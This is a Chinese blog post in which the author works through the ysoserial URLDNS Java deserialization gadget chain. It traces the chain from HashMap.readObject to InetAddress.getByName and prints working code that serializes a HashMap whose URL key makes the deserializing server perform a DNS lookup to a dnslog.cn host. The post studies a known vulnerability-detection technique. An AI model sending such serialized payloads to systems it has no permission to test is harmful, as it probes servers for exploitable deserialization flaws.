-
[JAVA反序列化] URLDNS
0x01
URLDNS链子 不能够RCE 但是通常作为验证是否存在反序列化漏洞的一种方式,学习反序列化先从 URLDNS开始,因为他短。 我的环境有问题,直接来审,环境就不说了,参考其他师傅的吧
源码:mirrors / frohoff / ysoserial · GitCode
分析
- public class URLDNS implements ObjectPayload
- public Object getObject(final String url) throws Exception {
- //Avoid DNS resolution during payload creation
- //Since the field
java.net.URL.handleris transient, it will not be part of the serialized payload. - URLStreamHandler handler = new SilentURLStreamHandler();
- HashMap ht = new HashMap(); // HashMap that will contain the URL
- URL u = new URL(null, url, handler); // URL to use as the Key
- ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
- Reflections.setFieldValue(u, "hashCode", -1); // During the put above, the URL's hashCode is calculated and cached. This resets that so the next time hashCode is called a DNS lookup will be triggered.
- return ht;
- }
- public static void main(final String[] args) throws Exception {
- PayloadRunner.run(URLDNS.class, args);
- }
- /**
- *
This instance of URLStreamHandler is used to avoid any DNS resolution while creating the URL instance.
- * DNS resolution is used for vulnerability detection. It is important not to probe the given URL prior
- * using the serialized object.
- *
- * Potential false negative:
- *
If the DNS name is resolved first from the tester computer, the targeted server might get a cache hit on the
- * second resolution.
- */
- static class SilentURLStreamHandler extends URLStreamHandler {
- protected URLConnection openConnection(URL u) throws IOException {
- return null;
- }
- protected synchronized InetAddress getHostAddress(URL u) {
- return null;
- }
- }
- }
HashMap ht = new HashMap();看的出,这个链反序列化的对象是HashMap的对象,因为是hashMap 的对象,所以我们去HashMap类 中找readobject 方法:
- private void readObject(java.io.ObjectInputStream s)
- throws IOException, ClassNotFoundException {
- // Read in the threshold (ignored), loadfactor, and any hidden stuff
- s.defaultReadObject();
- reinitialize();
- if (loadFactor <= 0 || Float.isNaN(loadFactor))
- throw new InvalidObjectException("Illegal load factor: " +
- loadFactor);
- s.readInt(); // Read and ignore number of buckets
- int mappings = s.readInt(); // Read number of mappings (size)
- if (mappings < 0)
- throw new InvalidObjectException("Illegal mappings count: " +
- mappings);
- else if (mappings > 0) { // (if zero, use defaults)
- // Size the table using given load factor only if within
- // range of 0.25...4.0
- float lf = Math.min(Math.max(0.25f, loadFactor), 4.0f);
- float fc = (float)mappings / lf + 1.0f;
- int cap = ((fc < DEFAULT_INITIAL_CAPACITY) ?
- DEFAULT_INITIAL_CAPACITY :
- (fc >= MAXIMUM_CAPACITY) ?
- MAXIMUM_CAPACITY :
- tableSizeFor((int)fc));
- float ft = (float)cap * lf;
- threshold = ((cap < MAXIMUM_CAPACITY && ft < MAXIMUM_CAPACITY) ?
- (int)ft : Integer.MAX_VALUE);
- // Check Map.Entry[].class since it's the nearest public type to
- // what we're actually creating.
- SharedSecrets.getJavaOISAccess().checkArray(s, Map.Entry[].class, cap);
- @SuppressWarnings({"rawtypes","unchecked"})
- Node
- table = tab;
- // Read the keys and values, and put the mappings in the HashMap
- for (int i = 0; i < mappings; i++) {
- @SuppressWarnings("unchecked")
- K key = (K) s.readObject();
- @SuppressWarnings("unchecked")
- V value = (V) s.readObject();
- putVal(hash(key), key, value, false, false);
- }
- }
- }
看到最后有个 putVal(hash(key), key, value, false, false);
调用了hash 函数计算哈希值,跟进hash
- static final int hash(Object key) {
- int h;
- return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
- }
调用了键的 hashCode函数,返回原来的源码,可以发现 ysoserial构造链 用的键是URL类,而不是Object的hashCode方法。
- URL u = new URL(null, url, handler); // URL to use as the Key
- ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
跟进url类的 hashcode方法: 所以我们这里需要将Key 实例化成我们需要的URL类。
跟进一下URL 类的hashCode方法:
- public synchronized int hashCode() {
- if (hashCode != -1)
- return hashCode;
- hashCode = handler.hashCode(this);
- return hashCode;
- }
如果hashCode == -1 则会就会重新计算hash Code ,调用handler的hashCode() ,看一下handler是什么:
handler 属性是 URLStreamHandler 类的对象 。
所以我们要跟进 URLStreamHandler 类的 hashCode() 方法
- protected int hashCode(URL u) {
- int h = 0;
- // Generate the protocol part.
- String protocol = u.getProtocol();
- if (protocol != null)
- h += protocol.hashCode();
- // Generate the host part.
- InetAddress addr = getHostAddress(u);
跟进到下面的 getHostAddress(u)
- protected synchronized InetAddress getHostAddress(URL u) {
- if (u.hostAddress != null)
- return u.hostAddress;
- String host = u.getHost();
- if (host == null || host.equals("")) {
- return null;
- } else {
- try {
- u.hostAddress = InetAddress.getByName(host);
最后调用了 getByName 方法,这里
InetAddress.getByName(host)的作⽤是根据主机名,获取其IP地址,在⽹络上其实就是⼀次 DNS查询。因此整个 Gadget 清晰了
整条链子:
HashMap.readObject()->HashMap.hash()—>URL.hachCode()—>URLStreamHandler.hachCode()—>URLStreamHandler.getHostAddress()->InetAddress.getByName()利用:
实际上,在HashMap中有一哥put 方法会调用我们需要触发的hash 方法
- public V put(K key, V value) {
- return putVal(hash(key), key, value, false, true);
- }
因此简单来说,排开反序列化的话,简单用一次put 就会触发一次 URLDNS。
测试一下:
- public static void main(final String[] args) throws Exception {
- HashMap aaa = new HashMap();
- String url = "http://2osumc.dnslog.cn/";
- URL url1 = new URL(url);
- aaa.put(url1,url);
- }
果然触发了
总结一下 运行的过程
定义的hash 是 HashMap 类型,所以调用hash.put 时便会调用 HashMap 类的 hash(key) ,之后会调用 key.hashCode() 方法 ,而我们在一开始实例化的HashMap对象的键时URL类型的(
HashMap), 所以就会调用URL类的hashCode方法。这里Debug可以看到hashCode的值为-1,所以会执行URLStreamHandler类的hachCode(),剩下部分就如之前整理的链顺序(不再解释了)
反射修改hashCode
我们需要在反序列化时触发URLDNS,但现在还未进行反序列化就已经执行了最后的getByName()方法
原因:如上图所示在反序列化之前这里的hashCode就已经变成了-1,而我们在反序列化之前并不想让他调用getByName即hashCode不为-1
解决办法:这种情况就需要通过我们的反射机制来修改hashCode的值,让它不为-1
查看hashCode属性发现其为私有属性
private int hashCode = -1;所以这里修改值得话就用到了反射爆破—>
setAccessible- import java.io.FileOutputStream;
- import java.io.IOException;
- import java.io.ObjectOutputStream;
- import java.lang.reflect.Field;
- import java.net.URL;
- import java.util.HashMap;
- public class DnsTest {
- public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
- HashMap
- URL url = new URL("http://2osumc.dnslog.cn");
- Class c = Class.forName("java.net.URL");
- Field hashCode = c.getDeclaredField("hashCode");
- hashCode.setAccessible(true); //反射爆破属性
- hashCode.set(url,123); //传参值不为-1即可
- hash.put(url,1);
- Serialize(hash);
- }
- public static void Serialize(Object obj) throws IOException {
- ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream("1.txt"));
- out.writeObject(obj);
- out.close();
- }
- }
此时调用后便没有返回任何结果
但这里的·hashCode·值被我们修改成了
123当我们反序列化后得到的就也还是123,所以在执行完hash.put后改回去即可hashCode.set(url,1);- package Sentiment.unserialize.URLDNS;
- import java.io.FileOutputStream;
- import java.io.IOException;
- import java.io.ObjectOutputStream;
- import java.lang.reflect.Field;
- import java.net.URL;
- import java.util.HashMap;
- public class DnsTest {
- public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException {
- HashMap
- URL url = new URL("http://93rjqs.dnslog.cn");
- Class c = Class.forName("java.net.URL");
- Field hashCode = c.getDeclaredField("hashCode");
- hashCode.setAccessible(true);
- hashCode.set(url,123);
- hash.put(url,1);
- hashCode.set(url,-1);
- Serialize(hash);
- }
- public static void Serialize(Object obj) throws IOException {
- ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream("1.txt"));
- out.writeObject(obj);
- out.close();
- }
- }
执行反序列化
- import java.io.FileInputStream;
- import java.io.IOException;
- import java.io.ObjectInputStream;
- public class Unserialize {
- public static void main(String[] args) throws IOException, ClassNotFoundException {
- ObjectInputStream In = new ObjectInputStream(new FileInputStream("1.txt"));
- Object obj= In.readObject();
- }
- }
成功触发
rethink
其实 也是挺简单的一条链子,难点也就是要理解类构造,然后需要知道反射机制。我也是蠢 硬是用了两天才看明白,但是明白之后收获很大,对JAVA反序列有了初步理解,很不错。会审一手CC1,看看我多久能消化完成吧hh,这个文章也是没有写的很通俗易懂。因为本人水平也不够,见谅
-
相关阅读:
读者自荐的 4 个 GitHub 项目
Fe3O4纳米粒子/氧化锌纳米粒子/纳米氧化铈/纳米聚乙烯修饰二氧化硅微球表征探究
智安新闻|智安网络亮相2023网安周!
【Java基础面试十二】、说一说你对面向对象的理解
Python+AI智能编辑人脸
Java线上云酒馆单预约系统源码小程序源码
使用CPU本地部署一个大模型
2004-2020年中小企业板上市公司财务报表股票交易董事高管1200+变量数据及说明
华为防火墙基础自学系列 | IPsec技术详解
IntelliJ IDEA 15个插件
- 原文地址:https://blog.csdn.net/snowlyzz/article/details/127740371
